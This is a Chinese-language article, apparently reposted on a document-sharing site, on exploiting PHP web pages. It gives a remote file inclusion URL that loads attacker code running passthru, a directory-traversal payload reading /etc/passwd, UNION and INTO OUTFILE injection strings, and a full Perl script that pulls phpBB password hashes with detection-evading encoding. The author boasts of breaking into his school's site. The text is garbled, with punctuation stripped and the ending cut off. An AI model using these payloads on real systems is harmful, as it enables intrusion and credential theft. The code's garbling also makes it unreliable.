版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡介
本文格式為Word版,下載可任意編輯——PHP頁面漏洞分析的方法PHP頁面漏洞分析的方法
PHP漏洞大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種。以下是我為大家探尋整理的PHP頁面漏洞分析的方法,接待大家閱讀!更多精彩內(nèi)容請實(shí)時(shí)關(guān)注我們我!
首先,我們來議論包含文件漏洞。這個(gè)漏洞理應(yīng)說是PHP獨(dú)有的吧。這是由于不充分處理外部供給的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令。我們來看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼:
以下是引用片段:
include$include./xxx.php;
?
在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個(gè)路徑來達(dá)成攻擊的目的。比方說我們提交:a.php?include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來攻擊的代碼了。我們可以在b.php中寫入類似于:passthru/bin/ls/etc;的代碼。這樣,就可以執(zhí)行一些有目的的攻擊了。注:Web服務(wù)器理應(yīng)不能執(zhí)行php代碼,不然就出問題了。相關(guān)詳情可以去看如何對PHP程序中的常見漏洞舉行攻擊。在這個(gè)漏洞方面,出狀況的好多,比方說:PayPalStoreFront,HotNews,MamboOpenSource,PhpDig,YABBSE,phpBB,InvisionBoard,SOLMETRASPAWEditor,LesVisiteurs,PhpGedView,X-Cart等等一些。
接著,我們再來看一下腳本命令執(zhí)行漏洞。這是由于對用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個(gè)例子:在PHPTransparent的PHPPHP4.3.1以下版本中的index.php頁面對PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達(dá)成攻擊的目的:http://web/index.php?PHPSESSID=在script里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息。在這個(gè)漏洞方面相對要少一點(diǎn),除了PHPTransparent之外還有:PHP-Nuke,phpBB,PHPClassifieds,PHPix,UltimatePHPBoard等等。
再然后,我們就來看看文件泄露漏洞了,這種漏洞是由于對用戶提交參數(shù)缺少充分過濾,遠(yuǎn)程攻擊者可以利用它舉行目次遍歷攻擊以及獲取一些敏感信息。我們拿最近察覺的phpMyAdmin來做例子。在phpMyAdmin中,export.php頁面沒有對用戶提交的what參數(shù)舉行充分過濾,遠(yuǎn)程攻擊者提交包含多個(gè)../字符的數(shù)據(jù),便可繞過WEBROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個(gè)地址:export.php?what=../../../../../../etc/passwd%00就可以達(dá)成文件泄露的目的了。在這方面相對多一點(diǎn),有:myPHPNuke,McNews等等。
結(jié)果,我們又要回到最興奮的地方了。想想我們平日在asp頁面中用SQL注入有多么爽,以前還要手動(dòng)注入,一向到小竹悟出SQL注入密笈嘿嘿,然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空。曾先后幫CSDN,大富翁論壇,中國頻道等大型網(wǎng)站找出漏洞。這些廢話不多說了,有點(diǎn)跑題了...。
還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致一致,只不過稍微留神一下用的幾個(gè)函數(shù)就好了。將asc改成ASCII,len改成LENGTH,其他函數(shù)根本不變了。其實(shí)大家看到PHP的SQL注入,是不是都會(huì)想到PHP-NUKE和PHPBB呢?不錯(cuò),俗話說樹大招分,像動(dòng)網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安好太差,而是名氣太響,別人用的多了,研究的人也就多了,察覺的安好漏洞也就越多了。PHPBB也是一樣的,現(xiàn)在很大一片面人用PHP做論壇的話,一般都是選擇了PHPBB。它的漏洞也是一向在出,從最早phpBB.comphpBB1.4.0版本被人察覺漏洞,到現(xiàn)在最近的phpBB2.0.6版本的groupcp.php,,以及之前察覺的search.php,profile.php,viewtopic.php等等加起來,約莫也有十來個(gè)樣子吧。這也一向?qū)е?,一片面人在研究php漏洞的時(shí)候都會(huì)拿它做測驗(yàn)品,所謂百練成精嘛,相信以后的'PHPBB會(huì)越來越好。
好了,我們還是來分析一下漏洞產(chǎn)生的理由吧。拿viewtopic.php頁面來說,由于在調(diào)用viewtopic.php時(shí),直接從GET苦求中獲得topic_id并傳遞給SQL查詢命令,而并沒有舉行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動(dòng)登錄或者舉行暴力破解。我想理應(yīng)不會(huì)有人想去暴力破解吧,除非有更加重要的理由。先看一下相關(guān)源代碼:
以下是引用片段:
#ifisset$HTTP_GET_VARS[POST_TOPIC_URL]
#
#$topic_id=intval$HTTP_GET_VARS[POST_TOPIC_URL];
#
#elseifisset$HTTP_GET_VARS[topic]
#
#$topic_id=intval$HTTP_GET_VARS[topic];
#
從上面我們可以看出,假設(shè)提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個(gè)樣子假設(shè)你還沒看過PHPBB源代碼的話,建議你看了再對著這里來看,受影響系統(tǒng)為:phpBB2.0.5和phpBB2.0.4。
以下是引用片段:
#$sql=SELECTp.post_id
#FROM.POSTS_TABLE.p,.SESSIONS_TABLE.s,.USERS_TABLE.u
#WHEREs.session_id=$session_id
#ANDu.user_id=s.session_user_id
#ANDp.topic_id=$topic_id
#ANDp.post_time=u.user_lastvisit
#ORDERBYp.post_timeASC
#LIMIT1;
Rick供給了下面的這斷測試代碼:
useIO::Socket;
$remote=shift||localhost;
$view_topic=shift||/phpBB2/viewtopic.php;
$uid=shift||2;
$port=80;
$dBType=mysql4;#mysql4orpgsql
printTryingtogetpasswordhashforuid$uidserver$remotedbtype:$dBType;
$p=;
for$index=1;$index=32;$index++
$socket=IO::Socket::INET-newPeerAddr=$remote,
PeerPort=$port,
Proto=tcp,
Type=SOCK_STREAM
ordieCouldntconnectto$remote:$port:$@;
$str=GET$view_topic.?sid=1topic_id=-1.random_encodemake_dbsql.view=newest.HTTP/1.0;
print$socket$str;
print$socketCookie:phpBB2mysql_sid=1;#replacethisforpgsqlorremoveit
print$socketHost:$remote;
while$answer=$socket
if$answer=~/location:.*x23d+/#Matchesthelocation:viewtopic.php?p=#
$p.=chr;
close$socket;
printMD5Hashforuid$uidis$p;
#randomencodestr.helpsavoiddetection
subrandom_encode
$str=shift;
$ret=;
for$i=0;$i
$c=substr$str,$i,1;
$j=randlength$str*1000;
ifint$j%2||$ceq
$ret.=%.sprintf%x,ord$c;
else
$ret.=$c;
return$ret;
submake_dbsql
if$dBTypeeqmysql4
returnunionselectordsubstringuser_password,.$index.,1fromphpbb_userswhereuser_id=$uid/*;
elsif$dBTypeeqpgsql
return;selectasciisubstringuser_passwordfrom$indexfor1aspost_idfromphpbb_postsp,phpbb_usersuwhereu.user_id=$uidorfalse;
else
return;
這段代碼,我就不多做解釋了.作用是獲得HASH值.
看到這里,大家可能有點(diǎn)疑問,為什么我前面講的那些改的函數(shù)怎么沒有用到,我講出來不怕大家笑話:其實(shí)網(wǎng)上好多站點(diǎn)有些頁面的查詢語句看起來會(huì)是這樣:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,這是真的,我還靠這個(gè)進(jìn)過幾個(gè)大型網(wǎng)站.至于哪一些,不好講出來,不過我們學(xué)校的網(wǎng)站,我就是靠這個(gè)進(jìn)后臺(tái)的,把前面那函數(shù)用上吧.不然你只有改人家的密碼了哦!!!
差點(diǎn)忘了一點(diǎn),在SQL注入的時(shí)候,PHP與ASP有所不同,mysql對sql語句的運(yùn)用沒有mssql生動(dòng),因此,好多在mssql上可以用的查詢語句在mysql中都不能奏效了.一般我們常見的注入語句像這樣:aaa.php?id=aintooutfilepass.txt或是aaa.php?id=aintooutfilepass.txt/*再進(jìn)一步可以改成:aaa.php?id=aor1=1unionselectid,name,passwordform
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年哈爾濱銀行七臺(tái)河分行招聘外包員工5人備考題庫完整答案詳解
- 2025年中國航空工業(yè)集團(tuán)凱天崗位招聘備考題庫及答案詳解參考
- 2025年龍巖市上杭縣人民法院招聘編外人員的備考題庫及1套完整答案詳解
- 2026年深空探測數(shù)據(jù)使用合同
- 2025年北京西城區(qū)高二(上)期末歷史試題和答案
- 監(jiān)管協(xié)管員面試題及答案解析(2025版)
- 有色金屬行業(yè)2025Q3總結(jié):Q3盈利同比繼續(xù)上行擁抱資源新周期
- 中國社會(huì)科學(xué)院世界經(jīng)濟(jì)與政治研究所2026年度公開招聘第一批專業(yè)技術(shù)人員6人備考題庫及答案詳解一套
- 來賓市公安局2025年第三次招聘輔警備考題庫及參考答案詳解一套
- 崇左憑祥市應(yīng)急管理局招聘考試真題2024
- 2025年衛(wèi)生系統(tǒng)招聘(臨床專業(yè)知識)考試題庫(含答案)
- 基建工程索賠管理人員索賠管理經(jīng)典文獻(xiàn)
- 工業(yè)機(jī)器人專業(yè)大學(xué)生職業(yè)生涯規(guī)劃書
- 農(nóng)貿(mào)市場消防安全管理制度
- 良品鋪?zhàn)訝I運(yùn)能力分析及對策研究
- 2025年戰(zhàn)略投資專員崗位招聘面試參考試題及參考答案
- 2025年小學(xué)教師素養(yǎng)大賽試題(含答案)
- 特種設(shè)備應(yīng)急處置課件
- 2025年科研年度個(gè)人工作總結(jié)(3篇)
- 2025年國家開放大學(xué)《中國現(xiàn)代文學(xué)專題》形考任務(wù)試題與答案
- 熱力管網(wǎng)建設(shè)工程方案投標(biāo)文件(技術(shù)方案)
評論
0/150
提交評論